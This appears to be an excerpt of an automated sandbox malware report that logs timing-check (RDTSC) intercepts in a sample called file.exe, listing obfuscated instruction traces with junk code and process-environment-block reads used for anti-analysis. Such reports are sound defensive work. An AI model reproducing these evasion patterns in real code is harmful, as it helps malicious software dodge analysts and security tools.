                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FF474 second address: 6FF49D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704E143BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F7704E143BFh 0x0000000e popad 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push esi 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FF49D second address: 6FF4AF instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7704DD53A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b mov eax, dword ptr [eax] 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FF4AF second address: 6FF4BD instructions: 0x00000000 rdtsc 0x00000002 js 00007F7704E143B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FF4BD second address: 6FF4C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FF4C1 second address: 6FF4C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FF4C5 second address: 6FF4E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7704DD53B2h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 701190 second address: 7011AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704E143C9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7011AD second address: 7011BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7704DD53ACh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01B10 second address: 4A01B25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704E143C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01B25 second address: 4A01B2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01B2B second address: 4A01B2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01B2F second address: 4A01B33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0C1E second address: 49A0C47 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704E143C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movsx edi, si 0x00000010 mov si, 713Bh 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0633 second address: 49D0637 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0637 second address: 49D063B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D063B second address: 49D0641 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A018F5 second address: 4A018F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A018F9 second address: 4A018FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A018FD second address: 4A01903 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01903 second address: 4A0196F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704DD53B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F7704DD53AEh 0x00000011 jmp 00007F7704DD53B5h 0x00000016 popfd 0x00000017 movzx esi, bx 0x0000001a popad 0x0000001b mov ebp, esp 0x0000001d jmp 00007F7704DD53B3h 0x00000022 pop ebp 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F7704DD53B5h 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 499088F second address: 4990894 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4990894 second address: 49908E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov esi, edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F7704DD53B8h 0x0000000f xchg eax, ebp 0x00000010 jmp 00007F7704DD53B0h 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F7704DD53B7h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49908E2 second address: 499092F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704E143C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [ebp+08h] 0x0000000c jmp 00007F7704E143BEh 0x00000011 sub eax, eax 0x00000013 pushad 0x00000014 push edi 0x00000015 call 00007F7704E143BAh 0x0000001a pop eax 0x0000001b pop edx 0x0000001c push eax 0x0000001d pop esi 0x0000001e popad 0x0000001f inc eax 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 mov ecx, 156F26A1h 0x00000028 mov edx, esi 0x0000002a popad 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 499092F second address: 4990949 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7704DD53B6h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4990949 second address: 4990984 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lock xadd dword ptr [ecx], eax 0x0000000c jmp 00007F7704E143C7h 0x00000011 inc eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F7704E143C5h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4990984 second address: 49909F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704DD53B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F7704DD53B3h 0x00000013 add ch, 0000006Eh 0x00000016 jmp 00007F7704DD53B9h 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007F7704DD53B0h 0x00000022 or eax, 18B5BAE8h 0x00000028 jmp 00007F7704DD53ABh 0x0000002d popfd 0x0000002e popad 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0000A second address: 4A00031 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704E143C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7704E143BAh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00031 second address: 4A00035 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00035 second address: 4A0003B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0003B second address: 4A00043 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, ax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00043 second address: 4A00054 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d mov di, cx 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00054 second address: 4A0006E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7704DD53B6h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0006E second address: 4A000A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704E143BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov dl, ch 0x0000000f mov dx, 62A4h 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F7704E143C6h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A000A2 second address: 4A0010D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 52EE0304h 0x00000008 push ebx 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr fs:[00000030h] 0x00000013 jmp 00007F7704DD53AFh 0x00000018 sub esp, 18h 0x0000001b jmp 00007F7704DD53B6h 0x00000020 xchg eax, ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F7704DD53ADh 0x0000002a or esi, 2049AE56h 0x00000030 jmp 00007F7704DD53B1h 0x00000035 popfd 0x00000036 mov esi, 1991EBC7h 0x0000003b popad 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0010D second address: 4A00113 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00113 second address: 4A00117 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00117 second address: 4A0011B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0011B second address: 4A00134 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7704DD53ACh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00134 second address: 4A00143 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704E143BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00143 second address: 4A00183 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7704DD53AFh 0x00000009 add ecx, 0982BCEEh 0x0000000f jmp 00007F7704DD53B9h 0x00000014 popfd 0x00000015 mov cx, 1077h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebx 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00183 second address: 4A0019E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov si, 0567h 0x0000000a popad 0x0000000b mov ebx, dword ptr [eax+10h] 0x0000000e pushad 0x0000000f mov di, 310Ah 0x00000013 popad 0x00000014 push ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0019E second address: 4A001B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704DD53AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A001B1 second address: 4A001E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704E143C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7704E143BDh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A001E0 second address: 4A00217 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704DD53B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [74E806ECh] 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F7704DD53B8h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00217 second address: 4A00226 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704E143BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00226 second address: 4A0027E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7704DD53AFh 0x00000009 add eax, 2356DD2Eh 0x0000000f jmp 00007F7704DD53B9h 0x00000014 popfd 0x00000015 mov eax, 64E4C3B7h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d test esi, esi 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F7704DD53B9h 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0027E second address: 4A002BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 mov dh, 67h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007F7704E15399h 0x00000010 jmp 00007F7704E143C2h 0x00000015 xchg eax, edi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F7704E143C7h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A002BA second address: 4A0031C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, cx 0x00000006 mov eax, 4F230557h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 mov esi, ebx 0x00000012 mov si, bx 0x00000015 popad 0x00000016 xchg eax, edi 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F7704DD53AAh 0x00000020 adc si, 74F8h 0x00000025 jmp 00007F7704DD53ABh 0x0000002a popfd 0x0000002b pushfd 0x0000002c jmp 00007F7704DD53B8h 0x00000031 sub ecx, 029ECF58h 0x00000037 jmp 00007F7704DD53ABh 0x0000003c popfd 0x0000003d popad 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0031C second address: 4A00322 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00322 second address: 4A0035F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call dword ptr [74E50B60h] 0x0000000e mov eax, 750BE5E0h 0x00000013 ret 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F7704DD53B8h 0x0000001d adc cl, FFFFFFE8h 0x00000020 jmp 00007F7704DD53ABh 0x00000025 popfd 0x00000026 movzx ecx, di 0x00000029 popad 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0035F second address: 4A00374 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7704E143C1h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00374 second address: 4A00378 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00378 second address: 4A003CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 00000044h 0x0000000a jmp 00007F7704E143BDh 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F7704E143C3h 0x00000019 sub ch, 0000003Eh 0x0000001c jmp 00007F7704E143C9h 0x00000021 popfd 0x00000022 mov esi, 3F4D9587h 0x00000027 popad 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A003CA second address: 4A003EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 movsx ebx, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c jmp 00007F7704DD53AEh 0x00000011 push eax 0x00000012 pushad 0x00000013 mov bh, E5h 0x00000015 push esi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A003EB second address: 4A0048F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 xchg eax, edi 0x00000007 pushad 0x00000008 pushfd 0x00000009 jmp 00007F7704E143C0h 0x0000000e xor ecx, 500B5CC8h 0x00000014 jmp 00007F7704E143BBh 0x00000019 popfd 0x0000001a call 00007F7704E143C8h 0x0000001f push ecx 0x00000020 pop edi 0x00000021 pop ecx 0x00000022 popad 0x00000023 push dword ptr [eax] 0x00000025 pushad 0x00000026 pushad 0x00000027 call 00007F7704E143C9h 0x0000002c pop esi 0x0000002d call 00007F7704E143C1h 0x00000032 pop ecx 0x00000033 popad 0x00000034 push ebx 0x00000035 jmp 00007F7704E143BCh 0x0000003a pop esi 0x0000003b popad 0x0000003c mov eax, dword ptr fs:[00000030h] 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007F7704E143C3h 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0048F second address: 4A004AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704DD53B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0050B second address: 4A005A5 instructions: 0x00000000 rdtsc 0x00000002 call 00007F7704E143C9h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov esi, eax 0x0000000d jmp 00007F7704E143C7h 0x00000012 test esi, esi 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F7704E143C4h 0x0000001b sub ah, 00000058h 0x0000001e jmp 00007F7704E143BBh 0x00000023 popfd 0x00000024 pushfd 0x00000025 jmp 00007F7704E143C8h 0x0000002a adc si, FFB8h 0x0000002f jmp 00007F7704E143BBh 0x00000034 popfd 0x00000035 popad 0x00000036 je 00007F77752134C9h 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f mov dx, 3BA6h 0x00000043 mov ecx, edi 0x00000045 popad 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A005A5 second address: 4A005AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A005AB second address: 4A005D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub eax, eax 0x0000000a pushad 0x0000000b mov ax, di 0x0000000e mov bx, E35Ch 0x00000012 popad 0x00000013 mov dword ptr [esi], edi 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F7704E143BDh 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A005D1 second address: 4A005D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A005D5 second address: 4A005DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A005DB second address: 4A006C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704DD53ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+04h], eax 0x0000000c pushad 0x0000000d movzx ecx, dx 0x00000010 mov si, dx 0x00000013 popad 0x00000014 mov dword ptr [esi+08h], eax 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F7704DD53ABh 0x0000001e sub cl, FFFFFFEEh 0x00000021 jmp 00007F7704DD53B9h 0x00000026 popfd 0x00000027 pushfd 0x00000028 jmp 00007F7704DD53B0h 0x0000002d jmp 00007F7704DD53B5h 0x00000032 popfd 0x00000033 popad 0x00000034 mov dword ptr [esi+0Ch], eax 0x00000037 pushad 0x00000038 call 00007F7704DD53ACh 0x0000003d pop edi 0x0000003e mov cl, 80h 0x00000040 popad 0x00000041 mov eax, dword ptr [ebx+4Ch] 0x00000044 jmp 00007F7704DD53B9h 0x00000049 mov dword ptr [esi+10h], eax 0x0000004c pushad 0x0000004d movzx ecx, dx 0x00000050 popad 0x00000051 mov eax, dword ptr [ebx+50h] 0x00000054 pushad 0x00000055 jmp 00007F7704DD53B1h 0x0000005a push ecx 0x0000005b mov cx, di 0x0000005e pop edi 0x0000005f popad 0x00000060 mov dword ptr [esi+14h], eax 0x00000063 jmp 00007F7704DD53B6h 0x00000068 mov eax, dword ptr [ebx+54h] 0x0000006b push eax 0x0000006c push edx 0x0000006d push eax 0x0000006e push edx 0x0000006f jmp 00007F7704DD53AAh 0x00000074 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A006C8 second address: 4A006CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A006CC second address: 4A006D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A006D2 second address: 4A0074D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop ebx 0x00000005 pushfd 0x00000006 jmp 00007F7704E143C8h 0x0000000b adc ecx, 17073778h 0x00000011 jmp 00007F7704E143BBh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr [esi+18h], eax 0x0000001d jmp 00007F7704E143C6h 0x00000022 mov eax, dword ptr [ebx+58h] 0x00000025 jmp 00007F7704E143C0h 0x0000002a mov dword ptr [esi+1Ch], eax 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F7704E143C7h 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0074D second address: 4A0077C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704DD53B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+5Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7704DD53ADh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0077C second address: 4A0078C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, di 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+20h], eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0078C second address: 4A00795 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 mov cl, bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00795 second address: 4A0083F instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F7704E143C4h 0x00000008 xor cl, 00000058h 0x0000000b jmp 00007F7704E143BBh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 mov eax, dword ptr [ebx+60h] 0x00000017 pushad 0x00000018 jmp 00007F7704E143C4h 0x0000001d pushfd 0x0000001e jmp 00007F7704E143C2h 0x00000023 or ch, FFFFFFE8h 0x00000026 jmp 00007F7704E143BBh 0x0000002b popfd 0x0000002c popad 0x0000002d mov dword ptr [esi+24h], eax 0x00000030 jmp 00007F7704E143C6h 0x00000035 mov eax, dword ptr [ebx+64h] 0x00000038 jmp 00007F7704E143C0h 0x0000003d mov dword ptr [esi+28h], eax 0x00000040 jmp 00007F7704E143C0h 0x00000045 mov eax, dword ptr [ebx+68h] 0x00000048 pushad 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0083F second address: 4A008A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushfd 0x00000006 jmp 00007F7704DD53B8h 0x0000000b adc eax, 3283B408h 0x00000011 jmp 00007F7704DD53ABh 0x00000016 popfd 0x00000017 popad 0x00000018 mov dword ptr [esi+2Ch], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F7704DD53ABh 0x00000024 adc ch, 0000004Eh 0x00000027 jmp 00007F7704DD53B9h 0x0000002c popfd 0x0000002d mov cx, B057h 0x00000031 popad 0x00000032 rdtsc
